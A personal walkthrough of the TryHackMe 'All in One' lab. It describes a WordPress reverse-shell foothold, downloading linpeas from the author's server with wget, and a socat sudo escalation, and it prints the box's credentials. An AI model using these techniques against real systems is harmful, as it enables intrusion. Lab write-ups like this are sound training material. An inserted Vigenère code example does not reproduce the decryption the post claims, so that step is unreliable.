So this is my first real attempt at doing a box with no hints or walkthroughs. Sadly I have looked at walkthroughs for every box. Even if just for a little single piece of information. The total time it took me to root this machine was about 7 hours. Once I got a shell the rest was easy. Here is my walkthrough of All in One on TryHackMe.

Nmap Results
GoBuster Results
Nikto Results

These are normally what I run first. I found three things right away that stood out. Directories for /wordpress and /hackathons and of course the low hanging fruit FTP with anonymous. Which FTP ended up being a dead end as no files were there. I was hoping for a text file with a clue of some kind, no luck.

The next option was /Hackathons. I went there and was greeted with a lovely message. Damn how much I hate the smell of Vinegar !!! . So I checked the source and got my first nugget.

<!-- Dvc W@iyur@123 -->
<!-- KeepGoing -->

So my knee-jerk reaction was woot, a password. What the password was for, not sure. WordPress, FTP, or SSH, which I tried them all. No luck. So I moved on to looking at WordPress a bit more. And did a WPScan.

So first thing I did was check the version on WP 5.5.1 I believe. Which really came up with nothing. Then followed up with reflex-gallery. Which there was a vuln for version 3.1.3 for file upload. I wasted a good amount of time on that one. Really nothing came of it though. I came up with the thought that the issue was fixed in this version. So ran with the LFI on Mail Masta. That did work and I found the /etc/passwd file.

But the issue I had was I had no idea what files I was looking for. And as a low level user chances are I could not access them anyway. But I did confirm that elyana was also an account. Back to WordPress.

I thought I would try Elyana as a user and the password I thought I had

Password did not work but information showed that was a user. Checked it against another user and got a different error message. Which means I could brute force with Wfuzz but that would take a lot of time.

Now I was stuck and went to bed. The next day I was looking at my notes and saw Dvc W@iyur@123 looking at me and thought I wonder if it is a cipher. The @’s and space really threw me off. I might have seen it sooner if it was not for that. So I went to my 19th favorite website dcode.fr and ran a cipher identifier.

And I never felt like I missed the biggest clue. I hate the smell of Vigenere!!!

So I ran a Vigenere cipher. I was really excited almost shaking I finally get to log into something. That did not last.

H@eres@123 I mean really is that the password. Well chances are it is not on a list. So I tried again, WordPress, FTP, SSH, no luck, which really I kinda thought. I am actually a certified encryption specialist through ECES. Yeah I slipped that flex in. But my mind went straight to I wonder if there is a key for it. Going back to my notes I saw KeepGoing which at the time I just thought the maker of the box was trolling us. But I tried it as a key. This time was much better.
Try H@ckme@123 which would you believe it! It worked for WordPress. For me it is always the first foothold I have a hard time with. My goto is always changing a PHP of an extension to my favorite reverse shell. Pentest Monkey.
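The decryption step described above, as an added example that is not part of the original post: a Vigenère routine that advances the key only on letters and passes digits, spaces and symbols through unchanged, which is why the `@` characters and `123` survive in the ciphertext. The function names are assumptions made for this illustration.

```python
import string


def _shift(text: str, key: str, sign: int) -> str:
    """Apply Vigenere shifts to ASCII letters only, preserving case.

    Non-letters (digits, '@', spaces) are copied as-is and do NOT
    consume a key letter, matching the behaviour seen on this box.
    """
    shifts = [ord(k) - ord("a") for k in key.lower()
              if k in string.ascii_lowercase]
    if not shifts:
        raise ValueError("key must contain at least one ASCII letter")
    out = []
    pos = 0  # index into the key, advanced on letters only
    for ch in text:
        if ch in string.ascii_letters:
            base = ord("A") if ch.isupper() else ord("a")
            offset = (ord(ch) - base + sign * shifts[pos % len(shifts)]) % 26
            out.append(chr(base + offset))
            pos += 1
        else:
            out.append(ch)
    return "".join(out)


def vigenere_decrypt(ciphertext: str, key: str) -> str:
    return _shift(ciphertext, key, -1)


def vigenere_encrypt(plaintext: str, key: str) -> str:
    return _shift(plaintext, key, +1)


if __name__ == "__main__":
    # Both values come from the HTML comments found in the page source.
    comment = "Dvc W@iyur@123"
    key = "KeepGoing"
    print(vigenere_decrypt(comment, key))
```

The ciphertext keeps the length, case pattern, punctuation and digits of the plaintext, so a string like this in page source is recognisable as an encoded credential at a glance.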

Before I upload it I need to start my netcat

And it worked!! I have a shell. www-data but I'll take it!! So the first two things I always do is run sudo -l to see if I can run anything as sudo, which I could not. So LINPEAS to save the day. So I cd /tmp

Started my python server. And wget http://mytunip/linpeas.sh. A quick chmod +x later we are off and running.

A lot of options. But some I needed to be a different user. Now really I should have checked the home directory for Elyana first. But I finally got around to it. The home directory had two files one users.txt and the other hint.txt So I tried to cat users.txt but I could not. So I ran cat against hint.txt

Find the hidden password. Well that is easy enough. I ran find against elyana and this showed up.

Now that is a file I was not expecting to see there.

Opened up and found this.

Okay finding the password was pretty easy. So I SSH’d into the computer with the new found information. And ran sudo -l and got this.

socat? The one linpeas flagged as orange and red? Game over. Jumped on gtfobin.com and grabbed this
Ran it and done.

Now for the final bits. Went to root got the key and got the key for the user.

Crap that does not look right. But I might know how to make it right. So I popped onto CyberChef and guessed that was base64, finished it.

So there are a few ways to do this box. I found at least two other ways but went for the easy win. It basically took over 6 hours for me to get a low level shell. And almost an hour more to get root. Try Harder!! I hate that phrase. Maybe instead we should say Don’t give up!!